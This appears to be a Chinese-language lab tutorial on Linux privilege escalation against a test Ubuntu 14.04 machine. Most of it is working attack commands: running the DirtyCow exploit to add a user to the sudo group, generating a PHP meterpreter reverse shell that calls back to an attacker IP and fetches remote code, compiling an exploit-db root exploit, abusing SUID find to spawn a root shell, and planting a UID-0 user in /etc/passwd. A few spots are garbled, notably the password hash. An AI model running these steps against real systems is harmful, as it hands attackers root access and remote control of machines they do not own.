Linux 提权( 二 ) _Linux

测试环境 ubuntu 14.04
exp下载地址： https://GitHub.com/Brucetg/DirtyCow-EXP
在靶场上新建普通用户 lian密码 123456
gcc -pthread dirtyc0w.c -o dirtyc0w chmod +x dirtycow ./dirtycow /etc/group "$(sed '/(sudo*)/ s/$/,lian/' /etc/group)"

文章插图

已经加入到sodu组可以切换root用户
Metasploit linux 提权简介
Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。
使用metasploit linux提权
生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.150.145 LPORT=12345 -f raw > /var/www/html/shell.php file_put_contents('m.php',file_get_contents('http://192.168.150.145/msf.php'));

msfconsole监听
use exploit/multi/handler set payload php/meterpreter_reverse_tcp set lhost 192.168.150.145 set lport 12345 exploit
访问 http://192.168.150.157/shell.php 就可以得到一个反弹shell
使用模块查询漏洞
run post/multi/recon/local_exploit_suggester

文章插图

shell 使用终端
https://www.exploit-db.com/exploits/37292
wget https://www.exploit-db.com/exploits/37292 gcc 37292.c -o exp chmod +x exp ./exp
如果成功就会得到一个root
suid提权简介
SUID是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限，那么该执行程序运行的时候将拥有ROOT权限。
以下命令可以发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm -4000-exec ls -ldb {} ;

利用

文章插图

我们使用find进行提权
find . -exec /bin/sh -p ; -quit

文章插图

常见suid提权文件有
【Linux 提权】nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget
具体的可以参考网站：
https://gtfobins.github.io/
passwd文件替换提权简介
听名字就知道我们想要重新生成一个passwd文件然后去替换passwd文件，最后使用高权限用户进行提权。
利用条件：
passwd文件可读可写（基本上不可能）
利用
查看 /etc/passwd 是否可写
ls -al /etc/passwd

文章插图

把原来/etc/passwd 中的文件进行复制
通过openssl passwd生成一个新的用户hacker，密码为hack123
openssl passwd -1 -salt hacker hack123
1 1 1hacker$0vnQaCNuzDe3w9d6jHfXQ0
将其追加到之前的/etc/passwd文件中
hacker: 1 1 1hacker$0vnQaCNuzDe3w9d6jHfXQ0:0:0:/root:/bin/bash
我们把文件放到远程服务器上使用wget进行下载下来
然后替换passwd文件
cp /tmp/passwd /etc/passwd